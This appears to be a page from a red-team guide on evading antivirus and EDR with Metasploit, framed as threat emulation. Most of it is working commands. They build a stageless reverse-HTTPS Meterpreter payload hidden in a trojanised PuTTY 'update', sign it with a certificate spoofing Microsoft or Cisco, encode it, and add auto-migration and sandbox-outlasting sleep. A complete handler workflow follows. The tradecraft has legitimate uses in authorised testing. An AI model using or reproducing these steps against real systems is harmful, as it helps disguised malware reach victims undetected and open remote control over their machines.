Skip to main content

Obfuscation & Evasion


Overview​

Metasploit payloads are well-known to AV and EDR vendors. Out-of-the-box, they will be caught. The goal here is not to build custom malware - it's to use what MSF gives you to reduce the detection footprint enough that a well-configured modern endpoint doesn't immediately kill the session.

These techniques layer. None is sufficient alone. Apply all of them.


Layer 1: Protocol and Port Selection​

This is the highest-value, lowest-effort change. Wrong choices here get you caught before a byte of payload is inspected.

# Never use this
set PAYLOAD windows/x64/meterpreter/reverse_tcp # Plain TCP, staged, port 4444
set LPORT 4444 # Blocked everywhere, heavily alerted

# Use this instead
set PAYLOAD windows/x64/meterpreter_reverse_https # HTTPS, stageless
set LPORT 443 # Looks like normal web traffic
ChoiceWhy It Matters
HTTPS over HTTPC2 traffic encrypted - no inline inspection of content
Port 443 (or 80, 8443)Passes outbound firewall rules; blends with normal web traffic
Stageless over stagedNo second connection to download stage - one less network event
reverse over bindBind listeners on the target are detectable; outbound connections are normal

Layer 2: HTTPS Handler with Custom Certificate​

By default, MSF generates a self-signed certificate with a predictable fingerprint that network tools and EDR can fingerprint. Replace it.

Generate a Custom Certificate​

# Create a self-signed cert with a believable subject
openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 \
-subj "/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/CN=update.microsoft.com" \
-keyout /opt/msf_certs/msf.key \
-out /opt/msf_certs/msf.crt

# Combine into PEM for MSF
cat /opt/msf_certs/msf.crt /opt/msf_certs/msf.key > /opt/msf_certs/msf.pem

Configure Handler to Use the Cert​

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https
msf6 > set LHOST <KALI_IP>
msf6 > set LPORT 443
msf6 > set HandlerSSLCert /opt/msf_certs/msf.pem
msf6 > set StagerVerifySSLCert false # Target doesn't verify our cert (expected)
msf6 > set ExitOnSession false
msf6 > exploit -j
Subject Selection

Use organization names and CNs that match expected network traffic for the target environment. If the target is a government network, use a believable government or common software vendor. update.microsoft.com, cdn.office.net, login.windows.net are all plausible.


Layer 3: Stageless Payload + Custom PE Template​

Combining stageless delivery with a legitimate PE template is the most effective MSF-native evasion approach.

# Embed stageless HTTPS payload into PuTTY
msfvenom -p windows/x64/meterpreter_reverse_https \
LHOST=<KALI_IP> LPORT=443 \
-x /opt/templates/putty.exe -k \
-f exe -o putty_update.exe

The resulting binary:

  • Has PuTTY's imports, metadata, and PE structure
  • Retains PuTTY functionality (-k flag) - it opens PuTTY and also calls back
  • Doesn't match the static byte pattern of a default MSF payload

Template Sources on Kali​

# Common templates available or downloadable
/opt/templates/putty.exe # PuTTY SSH client
/opt/templates/7zFM.exe # 7-Zip File Manager
/opt/templates/procexp64.exe # Sysinternals Process Explorer
/opt/templates/windump.exe # WinDump (Wireshark CLI)

Use 64-bit templates for 64-bit payloads. Mismatch will produce a broken binary.


Layer 4: Encoder Selection​

Encoders transform the payload bytecode. Avoid shikata_ga_nai - it is the most recognizable MSF signature in existence. Use x64/xor_dynamic or x64/zutto_dekiru for x64 payloads.

# x64 with XOR dynamic encoder, 10 iterations
msfvenom -p windows/x64/meterpreter_reverse_https \
LHOST=<KALI_IP> LPORT=443 \
-e x64/xor_dynamic -i 10 \
-f exe -o payload_encoded.exe

# Combined with template
msfvenom -p windows/x64/meterpreter_reverse_https \
LHOST=<KALI_IP> LPORT=443 \
-e x64/xor_dynamic -i 8 \
-x /opt/templates/putty.exe -k \
-f exe -o putty_enc.exe

More iterations improve obfuscation but increase file size. 8–12 iterations is a reasonable range.


Layer 5: Process Migration (Post-Execution)​

Even with good evasion, your delivery process may be killed or flagged by behavioral analysis shortly after execution. Migrate immediately.

meterpreter > migrate -N explorer.exe

Automate migration with PrependMigrate in the payload:

msf6 > set PrependMigrate true
msf6 > set PrependMigrateProc explorer.exe

This bakes the migration into the payload - Meterpreter migrates itself before the C2 session is even established. The delivery process exits before AV can analyze the running thread.


Layer 6: Sleep and Jitter​

Automated sandbox analysis runs payloads for a fixed time window (typically 30–120 seconds) and checks for malicious behavior. A payload that sleeps past the analysis window often evades sandbox detection.

In msfvenom​

# Add sleep before execution (seconds)
msfvenom -p windows/x64/meterpreter_reverse_https \
LHOST=<KALI_IP> LPORT=443 \
PrependSleep=120 \
-f exe -o payload_sleep.exe

In the Handler (C2 Jitter)​

Add communication jitter so the beacon doesn't fire at a perfectly regular interval - regular beacon intervals are a detection indicator.

msf6 > set SessionCommunicationTimeout 300
msf6 > set SessionRetryTotal 3600
msf6 > set SessionRetryWait 15

From inside Meterpreter, reduce check-in frequency manually:

meterpreter > sleep 60     # Sleep session for 60 seconds

Layer 7: HTTPS User-Agent Customization​

MSF's default Meterpreter HTTPS traffic uses a recognizable user-agent string. Set it to something common.

msf6 > set MeterpreterUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"

Putting It All Together​

Complete evasion-configured handler + payload workflow:

# Step 1: Generate cert
openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 \
-subj "/C=US/ST=California/L=San Jose/O=Cisco Systems/CN=update.cisco.com" \
-keyout /opt/msf_certs/msf.key -out /opt/msf_certs/msf.crt
cat /opt/msf_certs/msf.crt /opt/msf_certs/msf.key > /opt/msf_certs/msf.pem

# Step 2: Generate payload
msfvenom -p windows/x64/meterpreter_reverse_https \
LHOST=<KALI_IP> LPORT=443 \
PrependMigrate=true PrependMigrateProc=explorer.exe \
PrependSleep=60 \
-e x64/xor_dynamic -i 10 \
-x /opt/templates/putty.exe -k \
-f exe -o putty_v0.79_update.exe
# Step 3: Start handler
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https
msf6 > set LHOST <KALI_IP>
msf6 > set LPORT 443
msf6 > set HandlerSSLCert /opt/msf_certs/msf.pem
msf6 > set StagerVerifySSLCert false
msf6 > set ExitOnSession false
msf6 > set MeterpreterUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
msf6 > set SessionCommunicationTimeout 300
msf6 > exploit -j

What This Doesn't Solve​

MSF payloads are well-known. These layers reduce signature and behavioral detection, but they have limits:

Detection MethodMSF Evasion Effectiveness
Static AV signatureGood - encoding + template breaks most signatures
Behavioral sandboxModerate - PrependSleep helps, process migration helps
EDR memory scanningPoor - Meterpreter in-memory footprint is still recognizable to mature EDR
Network traffic analysisGood - HTTPS on 443 with custom cert blends well
JA3/TLS fingerprintingModerate - custom cert helps, but MSF's TLS negotiation is still fingerprintable

Against a mature EDR (CrowdStrike, SentinelOne, Carbon Black), these steps buy time and reduce noise but may not fully evade behavioral detection. For targets with mature EDR, consider whether Metasploit is the right tool - or whether delivery and execution need to happen through a more purpose-built implant.

MSF as a Starting Point

These evasion techniques are the ceiling of what MSF provides natively. They are appropriate for threat emulation against targets with standard AV (Windows Defender, etc.) or moderate EDR coverage. They represent what a capable threat actor could accomplish with publicly available tools - which is exactly the scenario CTE is meant to emulate.